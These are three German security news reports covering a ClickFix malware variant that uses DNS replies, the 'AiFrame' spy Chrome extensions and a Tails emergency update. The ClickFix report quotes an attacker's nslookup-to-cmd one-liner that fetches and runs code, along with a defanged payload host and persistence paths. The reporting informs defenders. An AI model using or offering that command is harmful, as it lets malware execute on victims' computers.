Bei ClickFix-Angriffen verleiten Cyberkriminelle ihre Opfer dazu, einen Befehl auf dem Rechner auszuführen, der angeblich ein Problem lösen soll. Tatsächlich installiert der jedoch Malware aus dem Internet. Eine neue Variante setzt dabei auf DNS-Antworten zur Verteilung der Schadsoftware.

Das hat Microsofts Threat-Intelligence-Team auf Linkedin bekannt gegeben. Um der Erkennung zu entgehen, setzen die Angreifer nun darauf, einen vermeintlich harmlosen „nslookup“-Befehl abzusetzen. Microsoft zeigt den Beispielaufruf von cmd /c ”nslookup example.com 84.xx.yy.zz | findstr ”^Name:” | for /f ”tokens=1,* delims=:” %a in (’more’) do @echo %b” cmd && exit\1 – dieser Befehl wird offenbar auch verschleiert mit eingeworfenen Sonderzeichen („^“) überliefert.

Microsoft: DNS-Antwort enthält Schadcode

Dieser Befehl fragt beim Zielserver mit der hier verschleierten IP-Adresse nach einer Auflösung für den Domain-Namen „example.com“. Die „Name:“-Antwort verarbeitet der Befehl dann, um den Schadcode der nächsten Infektionsstufe zu empfangen und auszuführen, erklären die IT-Forscher aus dem Microsoft-Defender-Team. Dieser Angriff umgeht klassischen Malware-Schutz, zudem sieht die serverseitige DNS-Antwort für Virenschutz in der Regel unverdächtig aus – anders als üblicherweise genauer untersuchter Netzwerkverkehr etwa von Webservern.

Der Schadcode aus der DNS-Antwort lädt dann eine .zip-Datei von „hxxp://azwsappdev[.]com/“ herunter, aus dem ein Portable-Python-Bundle sowie bösartiger Python-Code extrahiert werden. Der ausgeführte Python-Code untersucht die vorgefundene Windows-Umgebung und lädt schließlich die finale Infektionsstufe nach, die als „%APPDATA%\WPy64-31401\python\script.vbs“ im Dateisystem landet und mittels „%STARTUP%/MonitoringService.lnk“ im Autostart eingerichtet wird. Es handelt sich dabei um einen Fernzugriff-Trojaner namens „ModeloRAT“.

Bei ClickFix handelt es sich um Social-Engineering-Angriffe, die in der Regel über Phishing, Malvertising oder Drive-by-Köder (etwa gefälschte Captcha- oder „Beheben Sie dieses Problem”-Dialoge) eingesetzt wird, um Benutzer dazu zu verleiten, einen Befehl zu kopieren, einzufügen und auszuführen, fasst Microsoft diese Attacken-Variante zusammen. Gegen Drahtzieher solcher Angriffe gehen auch internationale Strafverfolger immer wieder vor. So konnten im Rahmen der „Operation Endgame 2.0“ etwa hunderte Server außer Gefecht gesetzt werden, die unter anderem ebenfalls für ClickFix-Attacken genutzt wurden.

(dmk)

Zig Chrome-Erweiterungen, die von mehr als 260.000 Nutzern und Nutzerinnen installiert wurden, sind Teil einer Kampagne, die es auf Daten und Informationen der Opfer abgesehen hat. Die kriminellen Hinterleute umgehen dazu auch Sicherheitsvorkehrungen des Chrome-Stores.

IT-Sicherheitsforscher von LayerX haben die „AiFrame“ genannte Erweiterungskampagne analysiert und die Ergebnisse in einem aktuellen Blog-Beitrag veröffentlicht. Die Täter bieten vermeintliche KI-Assistenten zum Zusammenfassen, Chatten, Schreiben oder als Gmail-Assistent in Form von Erweiterungen für den Webbrowser Chrome an. Die Erweiterungen wirken oberflächlich legitim, fußen aber auf einer gefährlichen Architektur. Viele Funktionen der Erweiterungen haben die Drahtzieher nicht lokal implementiert, sondern betten dazu serverseitige Schnittstellen aus dem Internet ein und funktionieren so als privilegierte Proxys, die der Infrastruktur aus dem Netz Zugriff auf sensible Browser-Fähigkeiten gewähren.

30 Erweiterungen mit 260.000 Installationen

Die Analysten haben über 30 unterschiedliche Chrome-Erweiterungen, die mit unterschiedlichen IDs und Namen veröffentlicht wurden, aber derselben darunterliegenden Codebasis, Berechtigungen und Backend-Infrastruktur entdeckt. Sie wurden zusammen mehr als 260.000 Mal installiert – einige davon waren zeitweise im Chrome Web Store als empfohlen (Featured) markiert, was ihre vermeintliche Legitimität erhöhte. Als Köder dienen bekannte Namen wie Claude, ChatGPT, Gemini sowie Grok, aber auch als allgemeines „AI Gmail“-Tool werden die bösartigen Erweiterungen beworben und verteilt.

Die Analyse schaut detaillierter auf die Erweiterungen. Trotz unterschiedlicher Namen und IDs teilen sie sich dieselbe interne Struktur, dieselbe JavaScript-Logik, Berechtigungen sowie Backend-Infrastruktur. Es handelt sich daher um eine koordinierte Operation anstatt um eigenständige Werkzeuge. Es handelt sich den IT-Forschern zufolge um sogenanntes „Extension Spraying“, bei dem die Angreifer Auswirkungen von entfernten Erweiterungen und reputationsbasierten Abwehrmechanismen umgehen, indem sie einfach unter neuem Namen weitere Erweiterungen in den Store einstellen.

Kritisch ist, dass ein signifikanter Anteil der Funktionen der Erweiterungen durch im Netz gehostete Komponenten geliefert wird. Dadurch bestimmt sich ihr Laufzeitverhalten durch serverseitige Änderungen und nicht durch zur Installationszeit im Chrome-Web-Store untersuchten Code. Das ermöglicht somit die Umgehung von einem Teil von Googles Sicherheitsmechanismen. Die Kernkomponente wird dabei als Iframe vom Server eingebunden, der in Vollbildgröße dargestellt wird. Er überlagert die aktuelle Webseite und stellt visuell das Nutzerinterface der Erweiterung dar.

Spionagefunktionen

Auf Geheiß des serverseitigen Iframes analysiert die Erweiterung den aktiven Browser-Tab und extrahiert dessen Inhalt, den sie an den Server schickt. Das können auch sensible Informationen von Seiten sein, in denen Opfer gerade angemeldet sind. Das Iframe kann die Erweiterung auch anweisen, die Stimmenerkennung der Web-Speech-API zu starten, woraufhin diese dann ein Transkript an die entfernte Seite schickt – ein leicht auswertbarer Mitschnitt der Kommunikation ist möglich; jedoch begrenzen Browser-Berechtigungen in einigen Fällen den möglichen Missbrauch, erklären die IT-Forscher.

Der Command-and-Control-Server liegt auf der Haupt-Domain tapnetic[.]pro, wobei die einzelnen Erweiterungen unterschiedliche Subdomains davon aufrufen. Die Seite scheint auf den ersten Blick legitim, allerdings gibt es dort keine Funktionen, Downloads oder mögliche Nutzerinteraktionen. Es gibt dort auch kein klar benanntes Produkt oder auch keine Dienstleistung, somit handelt es sich offenbar um eine Tarnseite. Die Kampagne läuft bereits seit Längerem. Schon vor rund einem Jahr haben die Analysten eine Erweiterung aus dieser Kampagne untersucht, sie wurde aus dem Chrome-Web-Store am 6. Februar 2025 entfernt. Zwei Wochen später wurde sie unter neuer Erweiterungs-ID neu eingestellt und veröffentlicht.

Am Ende der Analyse liefern die IT-Forscher eine Auflistung von Indizien für Infektionen (Indicators of Compromise, IOCs). Dort benennen sie etwa IDs, Namen und Anzahl an aktiven Installationen der bislang entdeckten, schädlichen „AiFrame“-Erweiterungen.

Browser-Erweiterungen stellen ein beliebtes Einfallstor für Cyberkriminelle dar. Immer wieder fallen sie für diverse Webbrowser negativ auf. Anfang vergangenen Jahres konnten sich etwa Täter Zugriff auf Konten von Entwicklern diverser Chrome-Extensions verschaffen und den Code durch schädliche Fassungen der Erweiterungen ersetzen.

(dmk)

Die Entwickler der anonymisierenden Linux-Distribution Tails haben Version 7.4.2 herausgegeben, die sie selbst als Notfallupdate bezeichnen. Darin schließen sie mehrere Sicherheitslücken im Linux-Kernel.

In der Versionsankündigung von Tails 7.4.2 erklären sie, dass diese Version ein „Notfall-Release zum Beheben kritischer Sicherheitsschwachstellen im Linux-Kernel“ darstellt. Die Sicherheitsmitteilung DSA 6126-1 zum aktualisierten Debian-Kernel 6.12.69-1 umfasst mehr als hundert Schwachstellen; nicht jede davon ist jedoch schwerwiegend. Die Folgen wären jedoch fatal: „Wenn Angreifer in der Lage sind, andere, bislang unbekannte Schwachstellen in einer in Tails enthaltenen Software zu missbrauchen, können sie durch DSA 6126-1 die volle Kontrolle über dein Tails erlangen und dich deanonymisieren“, führen die Tails-Programmierer aus.

Schwachstellen schwer auszunutzen

Jedoch seien Angriffe sehr unwahrscheinlich, heben sie hervor. Sie könnten jedoch von „starken Angreifern wie Regierungen oder Hacking-Firmen durchgeführt werden“. Die Tails-Maintainer haben keine Kenntnis darüber, dass derartige Attacken in der Praxis ausgeführt wurden.

Die neue Tails-Fassung hat zudem den Mail-Client Thunderbird in Version 140.7.1 an Bord. Die Programmierer haben Probleme etwa beim Öffnen der WLAN-Einstellungen aus dem Tor-Verbindungsassistenten heraus gelöst. Das erneute Öffnen von Electrum soll nun wieder klappen, wenn es zuvor nicht sauber geschlossen wurde. Zudem haben sie korrigiert, dass die ausgewählte und auf USB-Stick gespeicherte Sprache im Willkommen-Dialog angewendet wird.

Wie üblich steht die aktuelle Tails-Version als Abbild zum Verfrachten auf USB-Sticks und als ISO-Image für VMs oder zum Brennen auf DVDs zum Herunterladen auf der Tor-Webseite bereit. Die Version für den USB-Stick können Interessierte unterwegs dabeihaben, um damit auf fremden Rechnern eine gesicherte und geschützte Umgebung zum anonymen Surfen im Netz zu starten. Damit lassen sich etwa Zensurmaßnahmen umgehen.

Vor zwei Wochen hatten die Tails-Maintainer die Fassung 7.4.1 veröffentlicht. Auch dabei handelte es sich schon um ein Notfallupdate, das insbesondere die mitgelieferte OpenSSL-Bibliothek auf den Stand 3.5.4 gebracht hat. Die korrigiert Fehler, die Angreifern das Einschleusen von Schadcode und in der Folge im Tor-Kontext die Deanonymisierung von Nutzern ermöglichen, erklärten die Entwickler dazu.

(dmk)